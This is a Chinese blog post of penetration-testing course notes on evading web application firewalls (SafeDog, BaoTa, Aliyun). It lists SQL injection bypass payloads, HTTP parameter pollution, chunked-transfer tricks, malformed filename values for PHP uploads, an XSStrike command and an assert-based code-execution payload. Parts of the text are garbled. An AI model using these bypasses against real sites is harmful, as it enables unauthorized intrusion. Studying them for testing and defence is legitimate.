第八十天 WAF攻防-漏洞利用&HPP污染&分块传输&垃圾数据

最新推荐文章于 2024-07-22 10:00:00 发布
最新推荐文章于 2024-07-22 10:00:00 发布
阅读量1.1k 收藏 20
点赞数 14
分类专栏: 网络安全全栈学习笔记 文章标签: web安全 网络安全 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46343633/article/details/136586256
版权
本文详细探讨了WAF防御中的漏洞利用技巧,如MySQL注入的不同函数组合、参数污染、分块传输和垃圾数据处理。还涉及了文件上传的安全隐患,如文件名解析、XSS和文件包含攻击,以及安全狗工具在不同场景下的应用和宝塔插件的拦截策略。
摘要由CSDN通过智能技术生成

第80天 WAF攻防-漏洞利用&HPP污染&分块传输&垃圾数据

在这里插入图片描述

参考点:

#将MySQL注入函数分为几类
拆分字符串函数:mid、1eft、1pad等
编码函数:ord、hex、a3ci等
运算函数:±*/&^!1 ike rlike reg等
空格替换部分:09、0a、0b、0c、0d等
关键数据函数:user()、version()、database()等
然后将这些不同类型的函数组合拼接在一起

上传参数名解析:明确哪些东西能修政?

Content-Di3 position:一般可更改
name:表单参数值,不能更改
filename:文件名,可以更改
Content-Type:文件MIME,视情况更改

演示案例:

安全狗-SQL注入&文件上传-知识点
安全狗-文件包含&代码执行-知识点
BT&Aliyun-SQL注入&文件上传-知识点
BT&Aliyun-文件包含&代码执行-知识点
在这里插入图片描述
在这里插入图片描述

安全狗-SQL注入&文件上传-知识点

SQL注入 https://www.cnblogs.com/cute-puli/p/11146625.html
关键字替换
使用like 代替 and
更换提交方式:
POST id=-1 union select 1,2,3–+
在这里插入图片描述
更改POST提交编码格式
在这里插入图片描述

模拟文件上传传递数据
分块传输:更改数据请求格式
前提提交方式必须为POST
https://github.com/cOny1/chunked-coding-converter
HPP参数污染:id=1/**&id=-1号20 union号203e1ect号201,2,3号23*/
在这里插入图片描述
在这里插入图片描述

文件上传:换行解析&垃圾溢出&00干扰&=符号干扰&参数模拟

filename=a.php
filename="a.php
filename=“a.php号%00”
垃圾数据;filename=“a.php”
无限filename;filename=“a,php”
filename==“a.php”
filename=“name='uploadfile.php”
在这里插入图片描述

filename=“Content-Disposition:form-data.php”
filename==“a.ph
p”

BT&Aliyun-文件包含&代码执行-知识点

https://github.com/s0md3v/XSStrike
python xsstrike.py -u
“http://test.xiaodi8.com/pikachu/vul/xss/xss reflected get.php?mes
sage=1&submit=submit”–proxy
txt=Sy=str replace(‘x’,‘’,‘pxhpxinxfo()’);assert ($y);&submit=8688
F응90응E4용BA응A4
文件包含:没什么好说的就这几种
…·/…1等

安全狗:

注入ss文件上传拦截
rce文件包含等其他不拦截
宝塔:
注入上传拦截
rce文件包含Xss等其他不拦截
其中拦截的是关键字
aliyun
拦截的CC速度和后门信息收集和权限维持阶段拦截
漏洞利用他不拦截默认的版本(升级版本没测试)

清歌secure
关注
  • 14
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第80天:红蓝对抗-AWD模式&准备&攻防&监控&批量1
08-03
- **POC/EXP库**:收集并维护漏洞验证(Proof of Concept, POC)和利用(Exploit)脚本,以便快速利用或防御。 - **WAF和批量脚本**:部署Web应用防火墙(Web Application Firewall, WAF)以保护服务,并准备批量...
管理系统系列--CDN & WAF集群管理系统。.zip
02-25
管理系统系列--CDN & WAF集群管理系统。
WAF攻防第八十天
B_l_a_nk的博客
07-07 373
1、SQL注入&文件上传绕过 2、XSS跨站&其他漏洞绕过 3、HPP污染&垃圾数据&分块
第80天:WAF 攻防-漏洞利用&HPP 污染&分块传输&垃圾数据
weixin_71529930的博客
05-08 654
首先安全狗,没有对文件包含以及代码执行有过滤规则,因为不像sql注入和文件上传一样有比较明显的特征。但是,这里我实验过了,能够成功的原因是由于前面的两个等于号,删除等于号还是不行。视频中说可以删除双引号绕过,这里或许是我安全狗版本更新了?但是感觉我这个版本的安全狗多少有点申金在的,直接把我靶场禁止了。里面有很多个xss绕过waf语句,再设置上代理就可以无视waf。而宝塔的话,禁用命令是直接进行匹配,匹配到了就直接进行过滤。一个等于号是赋值,两个就是判断相等,三个是判断是否全等。但是这里或许是版本原因?
WAF攻防-漏洞利用HPP污染&分块传输&垃圾数据
siu~
04-19 564
1、SQL注入&文件上传绕过 2、XSS跨站&其他漏洞绕过 3、HPP污染&垃圾数据&分块
app,waf笔记
qq_45981247的博客
06-06 859
小迪渗透吧:网络安全工程师(Web攻防漏洞提权免杀等) 2023最新完整版
lw19155275856的博客
03-14 285
小迪渗透吧:网络安全工程师(Web攻防漏洞提权免杀等) 2023最新完整版
全程带阻:记一次授权网络攻防演练(下)
bylfsj的博客
10-19 928
*本文作者:yangyangwithgnu,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。 在一次漏洞赏金活动中,挖掘到一个不标准的命令注入漏洞,我无法用命令分隔符、命令替换符注入新命令让系统执行,所以,从”型态”上讲,它不算是命令注入漏洞;但我又可以借助目标环境让载荷到达系统命令行,实现读写文件、执行新命令,所以,”神态”来看,...
web安全学习
m0_73767545的博客
09-12 556
子域名两套CMS(同一服务器/不同服务器【同网关/不同网关】)也就是说对于同一网站页面,有不同域名,域名差异可能是前面,也可能是后面。利用网站抓包,server,如果信息比较全,可能是搭建软件。Day08--信息收集(架构,搭建,WAF)Day09--信息收集()
第47天:WAF绕过-漏洞发现之代理池指纹被动探针1
08-03
1.扫描速度-(代理池,延迟,白名单等) 2.工具指纹-(特征修改,伪造模拟真实用户等) 3.漏洞 Payload-(数据变异,数据加密,白名单等)
ByPassWAF&注入-漏洞银行大咖面对面11-倾旋
07-31
ByPassWAF&注入-漏洞银行大咖面对面11-倾旋
burpsuit分块传输插件,用于分块传输数据包来绕过WAF
02-05
burpsuit分块传输插件,用于分块传输数据包来绕过WAF
【网络安全科普】勒索病毒 防护指南
a38417的博客
07-20 1347
常规的杀毒软件查找病毒的原理一般是对当前计算机上的文件进行特征的检测,检测完成后和现有的病毒库中的特征数据进行匹配,如果可以匹配成功则找到病毒文件,因此现有的勒索病毒对我们常用的常规杀毒软件是一个很大的挑战。一旦勒索病毒感染了计算机,它会立即开始加密用户的文件,包括文档、图片、视频等,并在屏幕上显示要求用户支付赎金的消息。从操作系统来看被植入病毒的主要是Windows XP、Windows 7,原因是目前这些系统中有一部分微软官方已经不再支持更新、以及补丁的维护,一般会存在较多的无法及时修复的漏洞
网络安全法规对企业做等保有哪些具体规定?
最新发布
gmqqcsdn的博客
07-22 630
企业需根据信息系统被定级的保护等级,执行必要的安全保护措施,包括技术措施和其他必要措施,确保网络免受干扰、破坏或未经授权的访问,防止网络数据泄露或被窃取、篡改。根据《中华人民共和国网络安全法》,企业作为网络运营者,需要履行网络安全等级保护制度的相关义务,确保网络安全和数据保护。:企业应根据网络安全等级保护制度的要求,对其负责运行的信息系统进行安全保护等级的划分,并采取相应级别的安全保护措施。:企业在处理个人信息时,应遵循法律、行政法规的规定,建立个人信息保护影响评估等义务,确保个人信息的合法合规处理。
网络安全常用易混术语定义与解读(Top 20)
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
07-21 1066
没有网络安全就没有国家安全,网络安全已成为每个人都重视的话题。随着技术的飞速发展,各种网络攻击手段层出不穷,保护个人和企业的信息安全显得尤为重要。**然而,在这个复杂的领域中,许多专业术语往往让人感到困惑。为了帮助大家更好地理解网络安全的基本概念和术语,博主整理了20多个常见且容易混淆的专业术语。** 接下来,让我们一起深入探讨这些术语,掌握它们的真正含义!
网络安全领域五大注入攻击类型介绍
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
07-21 993
SQL注入是最常见的注入攻击类型之一,攻击者通过在输入字段中插入恶意的SQL代码来改变原本的SQL逻辑或执行额外的SQL语句,来操控数据库执行未授权的操作(如拖库、获取管理员信息、获取 WebShell权限等)。XSS攻击允许攻击者在用户的浏览器中执行恶意脚本,通常用于窃取用户的会话信息、Cookies等。应用程序包含反射式输入类型时容易出现跨站脚本攻击。比如弹出一个假的窗口骗取用户信息。命令注入攻击允许攻击者在服务器上执行任意命令,通常通过在输入字段中插入系统命令来实现。
网络安全----web安全防范
weixin_55357256的博客
07-16 802
以下代码用来防范流行的DDoS攻击,ARP欺骗,CC攻击,XXS攻击,对输入的恶意代码进行过滤,嵌入到web程序可以很好的防范网络攻击,但如果想要更好的防范网络攻击,还需要更加复杂的配置和更硬核的硬件。print(f"可能的 CC 攻击针对资源 {resource} 检测到")# 用于检测 CC 攻击的函数(简单示例,通过监测短时间内对同一资源的请求频率)# 用于检测 XSS 攻击的函数(简单示例,检查输入中是否存在可疑脚本标签)# 用于检测 DDoS 攻击的函数(简单示例,通过监测短时间内的连接数量)
Apache Spark 命令注入漏洞(CVE-2022-33891)修复与利用
Apache Spark 命令注入漏洞(CVE-2022-33891) Apache Spark 命令注入漏洞(CVE-2022-33891)是 Apache Spark 中的一种高危漏洞,允许攻击者通过命令注入来执行恶意命令,从而控制服务器。该漏洞影响 Apache Spark ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值